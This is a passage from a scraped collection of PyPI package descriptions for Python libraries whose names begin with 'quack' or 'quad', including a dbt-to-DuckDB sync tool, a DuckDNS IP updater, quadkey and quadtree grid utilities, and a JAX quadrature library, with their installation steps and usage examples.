This allows for faster and more cost-effective local development with dbt.Quackercurrently support syncing from eitherSnowflakeBigQueryFeaturesReplicates dbtsourcesto localDuckDBfiles.Simplifies localdbtdevelopment and testing.Supports flexibleprojectandmanifestdirectory paths.Supports flexible dbttargets.Supports multipledatabasesfrom the samewarehouse.(Optional) syncstablecopies of selected dbtmodelsto a DuckDB file as well.Quick terminologywarehouse- A Cloud Data Warehouse e.g.Snowflake,BigQuerydatabase- The highest level of data organisation in awarehouse. In BigQuery adatabaseis called aproject.schema- A logical grouping oftableswithin adatabase. In BigQuery aschemais called adataset.Getting StartedPrerequisitesBefore usingQuacker, you need to have the following set up:Pythoninstalled[Recommended] Avenvvirtual environmentA validdbtproject with awarehousetargetprofileA validtargetfor yourwarehousein yourdbtprofiles.ymlfileThe following adapters installed:dbt-duckdbdbt-e.g.dbt-bigquery(Optional)environment variablesloaded if you are using them in your dbt project.DuckDB ProfileAn exampleduckdbtargetprofile in aprofiles.ymlis seen below.In this example, mydbtsourcesexist in twosnowflakedatabasesfivetran_databasesnowflakeArbitrarily I have chosenfivetran_databaseas the name of thedatabasealldbtoutput will materialize in, but any of thewarehousedatabasenames could have been used here. All others need to beattachedto themaindatabase(here: thedatabaseof the namesnowflake).dev_duckdb:type:duckdbpath:data_duckdb/fivetran_database.duckdbattach:-path:data_duckdb/snowflake.duckdbschema:\"{{env_var('SNOWFLAKE_SCHEMA')}}\"Note:Thepathin theduckdbtargetprofile needs to match theduckdb_folder_namein thequacker_config.ymlfile if you are overwriting the default value. SeeOptional Configurationfor more details.Environment VariablesIf yourdbtproject usesenvironment variables, you will need to load them before runningquack sync. This is becausequack syncreads yourprofileto find the connection details of yourwarehouse.somedbtsetups useenvironment variablesto store these connection details.Here is an example of atargetwhich uses environment variables to store the connection details to thewarehousedatabase.dev_snowflake:account:\"{{env_var('SNOWFLAKE_ACCOUNT')}}\"database:\"{{env_var('SNOWFLAKE_DATABASE')}}\"password:\"{{env_var('SNOWFLAKE_PASSWORD')}}\"role:\"{{env_var('SNOWFLAKE_ROLE')}}\"schema:\"{{env_var('SNOWFLAKE_SCHEMA')}}\"threads:24type:snowflakeuser:\"{{env_var('SNOWFLAKE_USERNAME')}}\"warehouse:\"{{env_var('SNOWFLAKE_WAREHOUSE')}}\"[Optional] Conditionally persist docs based on contextIf you have the below in yourdbt_project.yml, you will receive the following error when running against duckdbERROR: alter_column_comment macro not implemented for adapter duckdb:models:+persist_docs:relation:truecolumns:trueTherefore, you need to have it set to only persist when running against your non-duckdbtarget. E.g.:+persist_docs:relation:\"{{target.name=='dev_snowflake'}}\"columns:\"{{target.name=='dev_snowflake'}}\"[Optional] Make your dbt models agnosticSome sql syntax is not compatible withduckdb. For example, offset() is not supported induckdb. Therefore, if you have amodelthat usesoffset(), you will need to make it agnostic to thetargettype. This can be done usingjinjaandifstatements. 
For example, the below code will work for bothduckdbandbigquerytargets:{%iftarget.type=='bigquery'-%}split(hubspot_contact_email_address,'@')[offset(1)]ashubspot_contact_email_domain_extracted,{%-eliftarget.type=='duckdb'-%}split_part(hubspot_contact_email_address,'@',2)ashubspot_contact_email_domain_extracted{%-endif%}NoteIf you cannot make yourmodelagnostic to thetargettype, you can add it to themodels_to_ignorelist in thequacker_config.ymlfile. SeeOptional Configurationfor more details.Installation for usepip3installquacker[Optional] Configuration;quacker_config.ymlQuackercan be configured using aquacker_config.ymlfile. This file should be placed in the same location as yourdbt_project.ymlfile. However, you don't need to create this file if you are happy with the default configuration. Below are the things you can configure in thequacker_config.ymlfile.row_limitThe maximum number of rows to query from thewarehousedatabasefor each table to be created duringquack sync. It is recommended to set this to a small number, but not at the expense of missing important data. The default value is1,000.Examplequacker_config.yml:row_limit:100duckdb_folder_nameThe name of the folder where theduckdbfiles will be stored. The default value isdata_duckdb.If you change this value, you will also need to update thepathin yourduckdbtargetprofile in yourprofiles.ymlfile. SeeDuckDB Profilefor more details.Examplequacker_config.yml:duckdb_folder_name:my_duckdb_foldermodels_to_ignoreA list ofdbtmodels to \"ignore\". This is useful formodelsthat are not compatible withDuckDB. For example,modelsthat useUNNEST(BigQuery) orPythondbtmodels.While we are \"ignoring\" thesedbtmodels during we still need to be able to rundbtagainstDuckDBafter thesync. To do this, the ignoreddbtmodelsare replicated astablesin the main DuckDB file during thesync.Examplequacker_config.yml:models_to_ignore:-stg_shopify__customers# dbt model 1-int_core__customers# dbt model 2Note:When subsequently runningdbtagainstDuckDB, you will need to pass the--excludeargument during yourdbt runsto avoid materialising thesemodelsin yourduckdbdatabase(you need to \"ignore\" them). For example, to \"ignore\" the two models during dbt operations:dbt run --exclude stg_shopify__customers int_core__customers.If you are configuringmodels_to_ignore, you will also need this setting inquacker_config.ymlsoQuackerknows where tosyncignored models to. There are plans to remove this requirement in the future.main_duckdb_database_name:fivetran_databaseNote:If you are usingmodels_to_ignore, make sure that yourduckdbtargethas the sameschemaname as thewarehousetarget. Otherwise your subsequentdbt runsmight fail because some of thetablesthat yourmodelsreference withref()are in a differently namedschemathan expected.UsageTo start usingQuacker, run thequack synccommand with the appropriateoptionalflags:quacksync\\--project-dir\\--profiles-dir\\--manifest-dir\\--compile-targetOptional Argument Flags--project-dir:Relativepath to the directory containing yourdbt_project.ymlfile. If not specified evaluates to the current working directory.--profiles-dir:Fullpath to the directory containing yourprofiles.ymlfile. If not specified, path is resolvedusing dbt's method.--manifest-dir:Relativepath to the directory containing yourmanifest.jsonfile. If not specified, assumed to be intarget/relative to theproject-dir.--compile-target: The dbt target name to sync the data from. It's also the targetQuackeruses when runningdbt compilebefore extracting identifiers. 
If not specified,Quackeruses thedefaultprofile.Example Usagequacksync\\--project-dir.\\--profiles-dir/Users/username/path/to/profiles\\--manifest-dir../poc_duckdb_for_local_dev/target\\--compile-targetdev_snowflakedbt runafterquack syncIn order to run dbt locally against your DuckDB database, ensure you switch to using yourDuckDBtargetwhich should be configured like this. Otherwise yourdbtrunwill send queries to yourwarehouseinstead of yourDuckDBdatabase.HelpTo see the full list of available commands and arguments, runquack --helpe.g.quacksync--helpHow It Worksanyquackcommand performs the following steps:Reads and parses thequacker_config.ymlfile if it exists.quack syncperforms the following extra steps:Checks for the existence of a folder nameddata_duckdb/or the value ofduckdb_folder_nameinquacker_config.yml. If it does not exist, it creates it. This is where theduckdbfiles will be stored.Compiles thedbtproject.Parses themanifest.jsonfile to find identifiers of all dbtsourcesand, optionally, dbtmodelsspecifiedquacker_config.yml.Queries thewarehousedatabasefor allsourcesandmodels_to_ignorewith a cap of 1,000 rows or the value specified inrow_limitinquacker_config.yml. If any of thesourcesormodels_to_ignorehave more than this number of rows,Quackerwill randomly sample the data itsyncs.Saves the queried data intoDuckDBfiles. Forsources, oneduckdbfile is generated with the same name as thedatabasein thewarehouseinstance. Formodels_to_ignore, themainDuckDBfile (matching one of thesourcedatabases) is updated with themodel's data. See how the main file is specified in sectionDuckDB profile.After quack sync, theduckdbfiles will be stored in this general folder structure, with one database file perwarehousedatabase:data_duckdb/\n\u251c\u2500\u2500fivetran_database.duckdb\n\u251c\u2500\u2500snowflake.duckdb\n\u2514\u2500\u2500...LimitationsConcurrent access to DuckDB filesYou should not attempt to query the DuckDB database files whileQuackeris running a sync operation. Two processes cannot connect to the same duckdb file at the same time.The error raised will be something likeduckdb.duckdb.IOException:IOError:Couldnotsetlockonfile\"/Users/amir/Projects/poc_duckdb_for_local_dev/data_duckdb/fivetran_database.duckdb\":ResourcetemporarilyunavailablePossible future enhancementsUnsorted QA feedback to be refined (i.e., not necessarily made into a TODO)Rittman delivery team's qarundbt depsbefore compileadd note to README: - you need to have done a fulldbt runbefore running quacker sync if you are using themodels_to_ignoreconfigurationfor bigquerysync: usesamplefunction instead ofrandomAmir's own qadon\u2019t fail whenquacker_config.ymlexists but has nokeys(e.g. everything is commented out)Bugs to fixBigQuery: when asourceis atableconnected to a google sheet, this error occurs even if 1. theservice accounthas access to the sheet and 2. the same credentials work in thedbtprojectgoogle.api_core.exceptions.Forbidden: 403 Access Denied: BigQuery BigQuery: Permission denied while getting Drive credentials.Incrementality and full refreshIf a table already exists in the duckdb database, the query should no be run against the warehouse and data should not be overwritten in the duckdb database. 
Instead, a message should be displayed to the user to inform them that the table already exists.If the user wants to overwrite the data in the duckdb database, they should be able to pass afull-refreshflag to thequack synccommand to do so.Selective syncIf the user only wants to overwrite select tables in the duckdb database, they should further be able to pass a--tablesflag to thequack synccommand to do so.DuckDB profile check and creationIf no suitableduckdbtargetprofileexists, we could create one. This would involve:finding allduckdbtargets for theproject'sprofilechecking if any of the existing targets have all thesourcedatabasesand useattachif sources are split across multipledatabasesif none of thetargetsare suitable, creating a newduckdbtargetin theproject'sprofilereturning a message to the user to inform them of the newduckdbtargetprofileGifs for READMEAdd gifs to the README to show how to useQuackerand what it does.Emphasise side-by-side comparison of running dbt against warehouse vs duckdb afterQuackersyncError messagesTarget issuesWhen the--compile-targetis not of a supportedwarehousetypeProfiles.yml issuesWhen theprofiles.ymlfile is not found in the expected locationTODO write up more relevant error messages to implement as they are discoveredExtract the main DuckDB database name from the duckdb dbt profileThis would remove the need for themain_duckdb_database_namesetting inquacker_config.yml.Dealing with non-compatible dbt modelsphase 1 solution(done Jan 2024)Allow users to specify dbt models to ignore in a config file.Duringquack sync, replicate the ignored dbt models as tables in the main DuckDB file.phase 2 solutionTemporary until phase 4 solution is implementedadd subcommandquack recommend, which from the config generates the--excludeargument so they can manually use it when running dbt against duckdbphase 3 solutionAdd toquack recommend: suggest models to ignore based on incompatible syntax, such as UNNEST (BigQuery) or Python dbt models.phase 4 solution3- add aquack dbtcommand with args (for ignore functionality)Run dbt command passed in argument e.g.run,buildTo make this seamless use positional arguments if possible. E.g., command isquack dbt run --full-refresh. In this example, bothrunand--full-refreshare positional arguments.Might need to use some sort of (*args, **kwargs) solution here?Pass as an--exclude(?) on all the models which are ignored in the configexample dbt command generated and executed byQuacker:dbt run --full-refresh --exclude model1,model5Stop and inform user if they try toPass--excludethemselves down to dbtRun a dbt command which doesn't accept--excludeargdbt command failsphase 5 solution0-quack debugTODO should this functionality be added toquack recommendorquack syncinstead of a new command?Among others, warn if any of the ignored models are not tables in duckdb and suggest re-run of 'quack sync'Long-term solutionquack recommendcould generate DuckDB syntax equivalents wrapped in Jinja based on the target. 
For syntax not yet translated, it would fall back on the ignore recommendation.Debugging toolsDevelopquack debugto warn users of any ignored models that are not tables in DuckDB and suggest re-runningquack sync.Support for other databasesAs needed, we could add support for other databases in addition to the ones we currently support:Snowflake added Dec 2023BigQuery added Jan 2024Completed enhancementsSupport for table names with reserved SQL keywordsBefore this enhancement, if asourceormodelname contained a reserved SQL keyword, thequack synccommand would fail:if the database_type wassnowflake, on querying thewarehouseif the database_type wasbigquery, on creating the table in theduckdbdatabaseMorequacker_config.ymlsettings (done Jan 2024)Ability to customise row limit withrow_limitsetting inquacker_config.ymlAbility to customise the name of the folder where duckdb files are stored withduckdb_folder_namesetting inquacker_config.ymlRetrieve connection details from target profile(done Jan 2024)Extract the Snowflake credentials directly from the dbt profile, avoiding the need for separate environment variables.Investigate dbt's source code or dbt power users' methods for retrieving these credentials.failedInstead, manually code to replicate the order in which dbt searches for theprofiles.ymlfile (exact name).relevant dbt profile documentation:Specified using the--profiles-dirruntime argumentEnvironment VariableDBT_PROFILES_DIR: If you have set the DBT_PROFILES_DIR environment variable, dbt will use the directory specified in this variable to look for the profiles.yml fileCurrent Working Directory: The current working directory is the directory from which you are running the dbt command (where dbt_project.yml is)Default Directory~/.dbt/Simplifying sync(done Jan 2024)Specify compile sync target, such assnowflake-prodordev_snwflkwith--sync_targetargument.this wouldDevelopment and ContributionWe welcome contributions and feedback on our tool! Please reach out to me if you have any questions or would like to contribute:amir.jab.93+quacker@gmail.comPyPIQuacker is published toPyPIInstallation for developmentClone theQuackerrepository and install it usingpip(ideally in avenvvirtual environment):gitclonehttps://github.com//quacker.gitcdquacker\npip3install-e.The dot.represents the current directory. It can be replaced with a path to theQuackerrepository if you cloned it elsewhere. No matter whereQuackeris stored, you can run installed versions of it from anywhere on your machine as long as you are in the same virtual environment that you installed it in.The-eflag is optional and is used to installQuackerin editable mode, which is useful during development ofQuackeritself as it allows changes to be immediately effective without reinstallation. 
You don't need to use this flag if you are just usingQuacker.ContributorsAmir Jaber |GitHub|LinkedInSupportIf you encounter any issues or have questions, please open an issue in the project'sGitHub repository.LicenseQuackeris released under the MIT License."} +{"package": "quackify", "pacakge-description": "No description available on PyPI."} +{"package": "quackmyip", "pacakge-description": "quackmyipKeep your public IP address updated, when using theDuckDNSservice.RequirementsIn order to work, this program, needs the following Python 3 libraries:requests(tested with v2.12.4)urllib3(tested with v1.19.1)InstallationYou can usepipto install it:pip install quackmyipSyntaxusage: quackmyip [-h] FILE\n\nUpdate your IP address for your duckdns registered domain\n\npositional arguments:\n FILE The configuration file to use\n\n optional arguments:\n -h, --help show this help message and exitFor its usage, it's recommended to create a daily cron job!.ConfigurationPrior to its usage, a configuration file must be created, as shown in the following example:[duckdns]\ntoken = [YOUR_TOKEN]\ndomain = [YOUR_DOMAIN]"} +{"package": "quackpanda", "pacakge-description": "QuackPanda: SQL Capability for Pandas using DuckDB \ud83e\udd86\ud83d\udc3cquackpanda is a Python library designed to bring Spark-like SQL capabilities to Pandas DataFrames using DuckDB, allowing users to execute SQL queries and perform advanced database operations directly on DataFrames.FeaturesSeamless integration with DuckDB for executing SQL queries on Pandas DataFrames.\nEfficient registration of DataFrames as temporary tables.\nSupports a variety of SQL functionalities, offering flexibility in DataFrame manipulation.\nInstallation\nTo install quackpanda, use pip:pip install quackpandaQuick Start\nHere's a basic example of how to use quackpanda to register a DataFrame as a table and execute a SQL query:importpandasaspdfromquackpanda.coreimportQuackPanda# Create a sample DataFramedata={'Name':['Alice','Bob'],'Age':[25,30]}df=pd.DataFrame(data)# Initialize QuackPandaqp=QuackPanda()# Register DataFrame as a temporary tableqp.register_temp_table(df,'people')# Execute SQL queryresult_df=qp.execute_query('SELECT * FROM people WHERE Age > 25')# Display the resultprint(result_df)DocumentationFor detailed information on quackpanda's features and usage, please refer to the official documentation (add the link to your documentation).ContributingWe welcome contributions to quackpanda! Please see our Contributing Guide for more details.Support & FeedbackFor support, questions, or feedback, please submit an issue on GitHub.Licensequackpanda is licensed under the MIT License.AcknowledgmentsSpecial thanks to the creators and contributors of Pandas and DuckDB for their incredible work, which made quackpanda possible.Make sure to adapt the file paths, URLs, and other specific information to match your project's actual details. 
Also, consistently update the README as your project evolves, adding new sections or modifying existing ones as needed."} +{"package": "quackpass", "pacakge-description": "QuackPassWorld's most secure password thingle thangle.Setuppip install quackpassYou need to be using a version greater then 3.6 for this library to work.UsageCODEfromquackpassimportquackpassmanager=quackpass.LoginManager(salt=os.environ['salt'],mode=\"txt\",file=\"passwords.txt\")manager.add_user(\"test\",\"secretpassword\")user=manager.login()print(f\"Logged in as{user}\")OUTPUTUsername: test\nPassword: secretpassword\nLogged in as test"} +{"package": "quackprofile", "pacakge-description": "PyPi:https://pypi.org/project/quackprofile/This Package Is To Show How A Duck Can Get A Profile In A CompanyHow To InstallOpen CMD / TerminalpipinstallquackprofileHow To UseOpen Idle And Type\u2026..my=Profile('Quacker')my.hobby=['Youtuber','Play Games']print(my.name)my.show_email()my.show_myart()my.show_hobby()Made By LlamaIsTheBest Hope You Enjoy :D"} +{"package": "quackquack", "pacakge-description": "DocumentationOverviewThis project aims to resolve problem of configuring an application, which needs to\nhave initialization step (for example: for gathering settings or establishing\nconnections) and use Python style code (context managers and decorators) with\ndependency injection to get those data.For example, normally you would need to use two separate mechanism for connection\nto the database (one for web, and one for celery). Mostly it uses the web framework\nconfiguration, to use in the celery code. It is fine, until a third sub-application\narrives. Or you have many microservices, where web frameworks are different\ndepending on the microservice purpose.Second goal was to make synchronized code without any globals or magic. That is\nwhy using Quack Quack you know when the application is initialized (started),\nor where to look for code you are using.In order to use QQ, you don\u2019t need to use hacks in some starting files, like\nimporting something from django, starting the application, and the import the\nrest.Quick Using ExampleTo use Quack Quack you need to create the application class (inherited fromqq.Application) in which you need to add plugins. After configuring, you\nneed to \u201cstart\u201d (initialize)\nthe application. 
After that you can use the application as context manager.\nAlso, you can make simple decorator, so you can use injectors (dependency\ninjection) in function\u2019s arguments.fromqqimportApplicationfromqqimportApplicationInitializerfromqqimportContextfromqqimportSimpleInjectorfromqq.pluginsimportSettingsPluginfromqq.plugins.typesimportSettingsclassMyApplication(Application):defcreate_plugins(self):self.plugins[\"settings\"]=SettingsPlugin(\"settings\")application=MyApplication()application.start(\"application\")withContext(application)asctx:print(ctx[\"settings\"])app=ApplicationInitializer(application)@appdefsamplefun(settings:Settings=SimpleInjector(\"settings\")):print(settings)samplefun()samplefun({\"info\":\"fake settings\"})# dependency injection !!context[\"settings\"]in above example, is a variable made by the SettingsPlugin.\nIf you would like to know more, please go to theTutorialInstallationpipinstallquackquack"} +{"package": "quacks", "pacakge-description": "If it walks like a duck and it quacks like a duck, then it must be a duckThanks toPEP544, Python now has protocols:\na way to define duck typing statically.\nThis library gives you some niceties to make common idioms easier.Installationpipinstallquacks\u26a0\ufe0f For type checking to work withmypy, you\u2019ll need to enable the plugin in\nyourmypy config file:[mypy]plugins=quacksFeaturesEasy read-only protocolsDefining read-only protocols is great for encouraging immutability and\nworking with frozen dataclasses. Use thereadonlydecorator:fromquacksimportreadonly@readonlyclassUser(Protocol):id:intname:stris_premium:boolWithout this decorator, we\u2019d have to write quite a lot of cruft,\nreducing readability:classUser(Protocol):@propertydefid(self)->int:...@propertydefname(self)->str:...@propertydefis_premium(self)->bool:..."} +{"package": "quad", "pacakge-description": "QUAD: Quantum State DatabaseGraduate research project for CMSC 33550 (Introduction to Databases) at University of Chicago.Installation$pip3uninstallcirq# Fix possibly conflicting packages$pip3installquad# InstallUsageimportquaddimension=100store=quad.VectorStore('path/to/vector/database')# Load or create vector database# First time only: Add vectors to databaseforiinrange(10):prng=np.random.RandomState(i)base_vector=prng.normal(size=dimension)forjinrange(10):# Generate any vectorsvector=base_vector+np.random.normal(scale=0.05,size=dimension)info={'any-data':...}vid=store.add(vector,info)# Several hashes available: L2DistanceHash, MipsHash, StateVectorDistanceHashh=quad.lsh.L2DistanceHash.from_random(d=dimension,r=2.5,preproc_scale=1,)# Create locality sensitive collection of vectorscollection=quad.AsymmetricLocalCollection(vector_store=store,base_lsh=h,meta_hash_size=10,number_of_maps=10,prng=np.random.RandomState(seed=5),# Ensure consistent across runs)forvidinstore:collection.add(vid)# Query similar vectors:prng=np.random.RandomState(4)query_vector=prng.normal(size=dimension)# Some query vectorquery_vid=store.add(query_vector,{'type':'query'})norm=1#np.linalg.norm(query_vid)close_vids=set(collection.iter_local_buckets(query_vid,scale=1/norm))print('Possibly close vids:',close_vids)assertclose_vids==set(range(40,50))Benchmarks$gitclonehttps://github.com/cduck/quantum-state-database# Clone repo$cdquantum-state-database\n$pipinstall-e.[dev]# Install dev requirements$pythonquad/benchmark/benchmark_generate.py# Generate test state vector data$pytestquad/benchmark/# Run all benchmarks"} +{"package": "quadai", "pacakge-description": "No description available 
on PyPI."} +{"package": "quadax", "pacakge-description": "quadax is a library for numerical quadrature and integration using JAX.vmap-able,jit-able, differentiable.Scalar or vector valued integrands.Finite or infinite domains with discontinuities or singularities within the domain of integration.Globally adaptive Gauss-Konrod and Clenshaw-Curtis quadrature for smooth integrands (similar toscipy.integrate.quad)Adaptive tanh-sinh quadrature for singular or near singular integrands.Quadrature from sampled values using trapezoidal and Simpsons methods.Coming soon:Custom JVP/VJP rules (currently AD works by differentiating the loop which isn\u2019t the most efficient.)N-D quadrature (cubature)QMC methodsIntegration with weight functionsSparse grids (maybe, need to play with data structures and JAX)Installationquadax is installable withpip:pip install quadaxUsageimportjax.numpyasjnpimportnumpyasnpfromquadaximportquadgkf=lambdat:t*jnp.log(1+t)epsabs=epsrel=1e-14a,b=0,1y,info=quadgk(fun,[a,b],epsabs=epsabs,epsrel=epsrel)assertinfo.err>>importquadbin>>>longitude=-3.7038>>>latitude=40.4168>>>resolution=10>>>quadbin.point_to_cell(longitude,latitude,resolution)5234261499580514303APIFunctionis_valid_index(index)is_valid_cell(cell)cell_to_tile(cell)tile_to_cell(tile)cell_to_point(cell, geojson=False)point_to_cell(longitude, latitude, resolution)cell_to_boundary(cell, geojson=False)cell_to_bounding_box(cell)get_resolution(index)index_to_string(index)string_to_index(index)k_ring(origin, k)k_ring_distances(origin, k)cell_sibling(cell, direction)cell_to_parent(cell, parent_resolution)cell_to_children(cell, children_resolution)geometry_to_cells(geometry, resolution)cell_area(cell)DevelopmentMake commands:init: create the environment and install dependencieslint: run linter (flake8) + fix (black)test: run tests (pytest)publish-pypi: publish package in pypi.orgpublish-test-pypi: publish package in test.pypi.orgclean: remove the environmentNOTE: Python2 is supported to enable the usage in platforms likeAmazon Redshift."} +{"package": "quadcelldetector", "pacakge-description": "QuadCellDetectorA Python package designed to simulate the electronic response of a circular quadrant cell photodiode to the passage of a gaussian profile laser beam across its surface.OverviewThe package simulates circular quadrant cell detectors, where the quadrant cell is characterized by a radius, and a gap that separates the four active photocell quadrants. 
This code allows the user to specify the beam shape, the path the beam takes across the detector, and it will output the signals produced by the photodiode: the sum of all four quadrants, the top two minus the bottom two, and the left two minus the right two.InstallationYou can install this package with pip through our PyPi package with the commandpip install quadcelldetectorAlternatively, since we usepbrinsetup.py, you can install from this github repository withhttps://github.com/university-of-southern-maine-physics/QuadCellDetector.git\ncd QuadCellDetector\npip install .ExamplesTo see a complete demonstration of the library features, see theDetectorDemoJupyter notebook.How To Get Help (or Help Us)If you found a bug, have a question, or otherwise need to contact us, pleaseread this.If you want to help us in the development process, or have an idea,read this.ContributorsPaul NakroshisBen Montgomery"} +{"package": "quadcropper", "pacakge-description": "No description available on PyPI."} +{"package": "quadcube", "pacakge-description": "quadcubePython library (written in rust) that currently provide one methodpix2vecfor converting between quadcube res15 pixel number to ecliptic unit vectors.The code is a reimplementation of parts of the COBE DIRBE map binning routines provided by A.J. Banday. See theCOBE Explanatory Supplementfor more information.Installpip install quadcubeExampleimportquadcubequadcube.pix2vec(98477345)# >>> array([[0.37147827],# [0.62248052],# [0.6888555 ]])pixels=[315879751,238749305,408302824,290970621,427780527]quadcube.pix2vec(pixels)# >>> array([[ 0.90477257, -0.51544922, 0.91755844, 0.74030402, 0.98561299],# [-0.40535959, 0.10338045, -0.39665074, -0.00232418, -0.00949373],# [-0.13065298, 0.85066127, 0.02747185, -0.67226822, 0.16875101]])"} +{"package": "quade", "pacakge-description": "Meet Quade, the friendly QA tool for Django!Quade is a Django app that makes quality assurance testing better. It\nhandles repeatedly setting up the same data so you don\u2019t have to.InstallationCheck out theQuickstart!LinksSource on GithubDocumentation at Read the DocsHistory0.2.2 (2018-02-02)Fix dependency problems when installing without Celery (#29).Improve help text when not using Celery (#22).Use transparent logo (#31).0.2.1 (2018-01-16)Coerce fixtures\u2019 return value into text (#14).0.2.0 (2018-01-12)Moved celery dependency to an extra namedcelery(#13).0.1.1 (2018-01-05)Release on PyPI!0.1.0 (2018-01-05)Preparation for release."} +{"package": "quad-filter", "pacakge-description": "A couple of utility functions used to locate the regions of a cartesian\nmap where a condition is true or falseIn many cases, this is not the optimal way to generate such tiles,\nbut it may be of use if you only have access to a function that\nreturn true for an area.Seehttps://gitlab.com/jbrobertson/quad-filter/for details."} +{"package": "quad-form-ratio", "pacakge-description": "This package provides tools related to the distribution of ratios of\nquadratic forms in (zero mean) normal random variables. 
These are\ndefined byDefinition of RIncluded are functions for simulation, evaluation of the support, and\nsaddlepoint approximations to the cdfand\ninverse cdf."} +{"package": "quadgrid", "pacakge-description": "QuadgridThequadgridpackage provides a class and some convenience functions\nfor generating quadtree-based grids at arbitrary resolutions in pandas, geopandas and xarray formats for use in geospatial analysis and catastrophe risk modelling.OverviewQuadtree grids are a way of recursively partitioning a plane into\nnested quadrants, allowing for simple but efficient geocoding of\npoints.Some assumptions have been made to simplify the package:all coordinates are in decimal degreesall longitudes range from -180 to +180 degreesthe centre of the grid is at 0E, 0NThe package contains a single class,QuadGrid, which is used to\ngenerate grid objects. The class has methods to convert the grid into\ntabular (pandas DataFrame), vector (geopandas GeoDataFrame) and raster\n(xarray Dataset) formats which can be saved or used in further processing.Individual quadcells at a given resolution are labelled with unique\nquadtreeIDs (qids). In the simplified example below, the red point is in top-level cell '2', then cell '2', then '0' then '3' giving a nominal qid of '2203'. In practice, quadtrees lend themselves to a base-4 encoding, allowing them to be stored and processed efficiently as integers.Versions0.1.2Changed email address in pyproject.toml0.1.1Bug fix to ensure user-specified bounded grid is consistent with the global grid0.1.0First release"} +{"package": "quadipy", "pacakge-description": "quadipyquadipyis a python package to help transform structured data into RDF graph format.We builtquadipyto enable developers to build a config based ingestion pipeline to an RDF data store (think like FiveTran or Stitch but for RDF).quadipywon't explcitly handle connections to different systems but will allow you to configure the RDF data you want to create from any data source.quadipyleveragesRDFLibto pythonically structure RDF data.The goal with this project is to enable transforming any tabular data structure into graph based RDF data. We go into depthhereon how we have used this config based system to build out our internal knowledge graph at Vouch! You can also check out our talk at KGC'22 on YouTube:Modeling the startup ecosystem using a config based knowledge graph.An example below shows what we mean by translating some tabular data into RDF graph data.For a step by step walk-through of how to do this with more examples, visittutorialsDev SetupRun to set up your dev enviornmentmakesetupUsagefromquadipyimportGraphFormatConfigconfig=GraphFormatConfig.parse_file(\"path/to/config.json\")quads=[config.quadify(record)forrecordinrecords]# records is an Iterator[Dict]quadipycan work with a variety of different data sources as long as what is sent to thequadifymethod is aDictEachQuadcreated has a.to_tuple()method that converts it to a tuple to help facilitate working withRDFLibGraphsfromrdflibimportURIRef,GraphfromquadipyimportQuadquad=Quad(subject=URIRef(\"Alice\"),predicate=URIRef(\"knows\"),obj=URIRef(\"Bob\"),graph=None)g=Graph()g.add(quad.to_tuple())Setting up a GraphFormatConfigThe main value ofquadipycomes from theGraphFormatConfig, which takes in a few parameters to configure the transformation of your data into RDF graph format. We provide configuration examples in theexamplesdirectory to help you get started. 
The full list of fields that can be configured is described below:fieldrequireddescriptionsource_nameYesA string that is used to describe the source (i.e. \"wikipedia\" for data from wikipedia)primary_keyYesThis is the key in your data that will be used for the subject of each valuepredicate_mappingYesA mapping where the keys are column names in your data source, and values a nested dict that required apredicate_urikey mapped to the RDF predicate in the target location and an optionalobj_datatypekey that maps to a custom datatype (currently we support [literal,uriref, ordate]). Ifobj_datatypeisn't specified, it will default toliteralsubject_namespaceNoA string prepended to the quad's subject as a namespace, instead of just using the value of theprimary_key. For example, forprimary_key=123andsubject_namespace=wikipediathe values generated wouldNOTbeURIRef(\"123\")butURIRef(\"wikipedia/123\")graph_namespaceNoSimilar tosubject_namespacein that this will assign each fact to a named graph with thegraph_namespace. This is useful to store metadata about fact provenance in named graphs.date_fieldNoThe column in your dataset that the fact's \"date\" will be pulled from. When specified, the named graph field in each fact will be built from the date. For example ifdate_field=created_atandcreated_at='2021-01-01in the source data the graph field will beURIRef(\"2021-01-01\"). This can can work in conjunction withgraph_namespaceValidate Config filesTo make sure the config files are valid, run the CLI by using the commandquadipyvalidate{path}wherepathcould be the directory for all the config files, e.g.examplesor a single config file e.g.examples/simple.jsonThis script usespydanticvalidator to make sure the config file is a valid JSON file, the required fields are presented and thepredicate_uris are validURIs (\"valid\" defined by RDFLibhere)"} +{"package": "quadkey", "pacakge-description": "UNKNOWN"} +{"package": "quadkey-boosted", "pacakge-description": "quadkey-boostedDescriptionquadkey-boosted is a high-performance Python library that provides a powerful set of tools and functions for working with quadkeys, enabling seamless integration of tile-based mapping systems into your Python applications. Built on top of a blazing-fast C implementation, quadkey-boosted offers lightning-fast calculations, ensuring optimal performance even with large-scale datasets.Key FeaturesAvailable API'sConversionlat lng to QuadKeyQuadKey to lat lngQuadKey to BingTileBingTile to QuadKeyPolygon to quadQuadKeykeysQuadKey to MultipolygonOperationsget parentget childrensget K neighboursMetadataget average tile sizeget zoom levelget tile distance between two tilesWKT, GeoJson, WKB representation of quadkeyC based backend for fast calculationsCan handle various types of projectionsLicenseProject Status\u2705 Add Basic convertion API\u274e Implement advance geospatial apis\u274e Add support for projectionsWhat is a QuadKey?A QuadKey is a string representation of a tile's location in a quadtree hierarchy. It is used to index and address tiles at different levels of detail (zoom levels). The QuadKey system is based on dividing the Earth's surface into quadrants using a quadtree structure.For more details on the concept, please refer to\ntheMicrosoft Article About this.InstallationRequirementsThis library requiresPython 3.6or higher. 
To compile it from source, Cython is required in addition.using pippipinstallquadkey-boostedFrom sourcePrerequisites (Linux)gccFedora:dnf install @development-toolsUbuntu / Debian:apt install build-essentialpython3-develFedora:dnf install python3-develUbuntu / Debian:apt install python3-devPrerequisites (Windows)Visual C++ Build Tools 2015 (with Windows 10 SDK) (seehere)Build from source# Clone repogitclonehttps://github.com/ls-da3m0ns/quadkey-boosted# Create Virtual Environmentpython-mvenv./venvsourcevenv/bin/activate# Install dependenciespipinstall-rrequirements.txt# Compilepythonsetup.pysdistbdist_wheel# Installpipinstalldist/quadkey-0.0.1-cp38-cp38-linux_x86_64.whlUsageBasic Usageimportquadkeylat=47.641268lng=-122.125679zoom=15# Convert lat lng to quadkeyqk=quadkey.geo_to_quadkey(lat,lng,zoom)# Convert quadkey to lat lng## get top left cornerlat,lng=quadkey.quadkey_to_geo(qk,corner=0)## get bottom right cornerlat,lng=quadkey.quadkey_to_geo(qk,corner=2)# Convert quadkey to bboxbbox=quadkey.quadkey_to_bbox(qk)# Convert quadkey to Tiletl=quadkey.quadkey_to_tile(qk)# Conver quadkey to quadintqi=quadkey.quadkey_to_quadint(qk)# Convert lat lng to quadintqi=quadkey.geo_to_quadint(lat,lng,zoom)# get parent quadkeyparent=quadkey.get_parent(qk)ReferencesI would like to acknowledge the following 